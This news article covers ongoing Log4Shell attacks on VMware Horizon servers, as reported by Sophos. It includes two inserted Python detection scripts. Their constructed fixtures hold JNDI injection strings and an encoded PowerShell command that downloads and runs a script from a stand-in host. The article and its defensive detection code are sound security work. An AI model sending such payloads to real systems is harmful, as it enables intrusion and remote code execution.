
My TechDecisions


VMware Horizon Servers Still Under Log4Shell Attacks

Hackers are still using the Log4Shell exploit to attack VMware Horizon servers and deploy cryptominers and backdoors, according to Sophos.

March 29, 2022, Zachary Comeau


Hackers are continuing to leverage the Log4Shell vulnerability to attack VMware Horizon servers and deploy cryptocurrency mining malware and backdoors, with a large wave of such attacks from mid-January still ongoing, according to cybersecurity firm Sophos.

In a new report, Sophos says attempts to exploit Horizon continued and grew in number throughout January. They were frequently associated with attempts to deploy cryptominers, but others appeared to be tied to initial access brokers or ransomware gangs.

Log4Shell is a critical vulnerability in Log4j, a widely used Java logging library. Log4j can perform lookups on the text it logs, including Java Naming and Directory Interface (JNDI) lookups against a Lightweight Directory Access Protocol (LDAP) server, so an attacker who can get a crafted string into a logged field can make the server fetch a resource from an LDAP server the attacker controls. In the Horizon attacks, that resource was a malicious Java class file that modified existing legitimate Java code on the server, adding a web shell that gives the attackers remote access and code execution. Sophos says it has observed such attacks since the beginning of January; its report was published Tuesday.
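The crafted strings the article describes are Log4j lookup expressions, and probes routinely hide the `jndi:` keyword behind nested lookups (`${lower:j}`, `${::-j}`) or URL-encoding. The following Python script is an added example, not code from the article or from the Sophos report: it collapses those obfuscation tricks and flags JNDI lookups in log lines. The access-log lines, IP addresses and payload strings are constructed, and the lookup-resolution rules are a detection heuristic, not a reimplementation of Log4j.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body containing no further '$', '{' or '}'.
INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once obfuscation has been collapsed: ${jndi:<scheme>://<host>...
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s]+)", re.IGNORECASE)


def normalize(text, max_passes=20):
    """Collapse Log4j lookup obfuscation so a hidden jndi: lookup becomes visible.

    Detection heuristic only, not Log4j's real lookup semantics:
      ${::-j}, ${env:NOPE:-j}   -> the default value after ':-'
      ${lower:X}, ${upper:X}    -> X with its case changed
      ${jndi:...}               -> kept as-is (this is what we are looking for)
      any other lookup          -> dropped
    """
    text = unquote(unquote(text))  # undo single or double URL-encoding

    def resolve(m):
        body = m.group(1).strip()
        low = body.lower()
        if low.startswith("jndi:"):
            return m.group(0)
        if ":-" in body:
            return body.split(":-", 1)[1]
        if low.startswith("lower:"):
            return body[6:].lower()
        if low.startswith("upper:"):
            return body[6:].upper()
        return ""

    for _ in range(max_passes):
        collapsed = INNER.sub(resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi_lookups(lines):
    """Return (line_no, scheme, host, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            hits.append((n, m.group(1).lower(), m.group(2), norm))
    return hits


# Constructed Tomcat-style access-log lines (not real traffic; 203.0.113.0/24 is a documentation range).
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Jan/2022:03:14:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [19/Jan/2022:03:14:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - [19/Jan/2022:03:14:11 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.9:1389/b}"',
    '203.0.113.9 - - [19/Jan/2022:03:14:12 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.9:1099/c}"',
    '203.0.113.9 - - [19/Jan/2022:03:14:13 +0000] "GET /portal/?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%3A1389%2Fd%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.7 - - [19/Jan/2022:03:14:20 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "app/1.0 ${date:yyyy}"',
]

if __name__ == "__main__":
    for n, scheme, host, norm in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {n}: jndi lookup via {scheme} to {host}")
        print(f"  normalized: {norm}")
```

Run against real Tomcat or Horizon access logs by replacing `SAMPLE_LOG` with the file's lines. The scheme and host returned for each hit are what you would pivot on next: the scheme tells you which JNDI transport the attacker tried, and the host is the attacker-controlled server that should show up in egress logs if the lookup succeeded.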

A large wave of attacks began on Jan. 14, some of which used Cobalt Strike to stage and execute the cryptominer payloads. However, the largest wave of Log4Shell exploits aimed at Horizon detected by Sophos began Jan. 19, and this wave did not rely on Cobalt Strike. Instead, the cryptominer installer script was executed directly from the Apache Tomcat component of the Horizon server, the report says.

According to Sophos, the earlier attacks had a typical process trace that starts from the Tomcat service executable and ends with the execution of a PowerShell script, which launches a standard Cobalt Strike reverse shell.

However, other exploits bypass the use of Cobalt Strike altogether and use Log4Shell to directly target the Tomcat server within Horizon.
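The process chain described above (the Tomcat service executable spawning a shell and then PowerShell) is what a hunt over process-creation telemetry looks for, with or without Cobalt Strike at the end of it. The script below is an added example, not code from the article or from the Sophos report: it rebuilds each shell's ancestry from simplified Sysmon-style process events and flags any cmd.exe or PowerShell whose ancestor is the Horizon Tomcat service, decoding an -EncodedCommand payload when present. The image name ws_TomcatService.exe is assumed for Horizon's Tomcat service, and the event records, file paths, address and encoded command are all constructed.

```python
import base64
import re

# Assumed image name of the Horizon Tomcat service on Windows; verify against your own hosts.
TOMCAT_IMAGES = {"ws_tomcatservice.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Common spellings of -EncodedCommand accepted by powershell.exe, followed by a base64 blob.
ENC_FLAG = re.compile(r"(?i)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def ancestry(ppid, by_pid):
    """Walk parent pointers upward and return ancestor image names, nearest first."""
    chain, seen = [], set()
    while ppid in by_pid and ppid not in seen:
        seen.add(ppid)
        chain.append(by_pid[ppid]["image"].lower())
        ppid = by_pid[ppid]["ppid"]
    return chain


def find_tomcat_spawned_shells(events):
    """Flag shells whose ancestry includes the Tomcat service, with any decoded payload."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if e["image"].lower() not in SHELLS:
            continue
        chain = ancestry(e["ppid"], by_pid)
        if any(img in TOMCAT_IMAGES for img in chain):
            findings.append({
                "pid": e["pid"],
                "image": e["image"],
                "chain": chain,
                "decoded": decode_encoded_command(e["cmdline"]),
            })
    return findings


# Constructed sample: a simplified Sysmon Event ID 1 (process create) stream, not real telemetry.
STAGE_URL = "http://203.0.113.9/stage.ps1"  # documentation-range address, constructed
PAYLOAD = f"IEX (New-Object Net.WebClient).DownloadString('{STAGE_URL}')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"pid": 600, "ppid": 4, "image": "services.exe", "cmdline": "C:\\Windows\\system32\\services.exe"},
    {"pid": 3300, "ppid": 600, "image": "ws_TomcatService.exe",
     "cmdline": '"C:\\Program Files\\VMware\\VMware View\\Server\\bin\\ws_TomcatService.exe" -run'},
    {"pid": 3412, "ppid": 3300, "image": "cmd.exe",
     "cmdline": f"cmd.exe /c powershell -nop -w hidden -enc {ENCODED}"},
    {"pid": 3420, "ppid": 3412, "image": "powershell.exe",
     "cmdline": f"powershell -nop -w hidden -enc {ENCODED}"},
    {"pid": 5120, "ppid": 700, "image": "explorer.exe", "cmdline": "C:\\Windows\\explorer.exe"},
    {"pid": 5130, "ppid": 5120, "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},  # benign admin use, not flagged
]

if __name__ == "__main__":
    for f in find_tomcat_spawned_shells(SAMPLE_EVENTS):
        print(f"pid {f['pid']} {f['image']} <- {' <- '.join(f['chain'])}")
        if f["decoded"]:
            print("  decoded command:", f["decoded"])
```

The ancestry walk matters more than the immediate parent: in the constructed sample the PowerShell process is a grandchild of the Tomcat service, so a rule keyed only on parent image would see cmd.exe and miss it. An interactive administrator's PowerShell under explorer.exe is left alone.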

The payloads deployed to Horizon hosts include several cryptocurrency miners: z0Miner, the JavaX miner and at least two XMRig variants, known as the Jin and Mimu cryptocurrency miner bots.

In addition, Sophos discovered several backdoors being used, including the Sliver implant, Atera agent and Splashtop Streamer (both legitimate software products being abused), along with several PowerShell-based reverse shells.

While some payloads were downloaded directly by the web shells used for initial compromise, the Jin bots were tied to the use of Sliver and used the same wallets as Mimu, suggesting they were operated by the same threat group.

VMware Horizon servers are among the most targeted products of attackers using the Log4Shell exploit. VMware has issued patches, but many organizations still have not mitigated the vulnerabilities by applying the patch or workarounds.

Even if systems are now patched, they may already have been compromised through the backdoors and reverse shells used in these attacks, according to Sophos, which urges organizations to thoroughly investigate their exposure to Log4Shell.

“Even if they have, as demonstrated by the backdoors and reverse shell activity we found, those systems may already be compromised in other ways,” the company says in its report.

Read the company’s report for more information on detecting these attacks.


Tagged With: Log4j, Log4Shell, Sophos, VMWare, Vulnerability


© 2025 Emerald X, LLC. All rights reserved.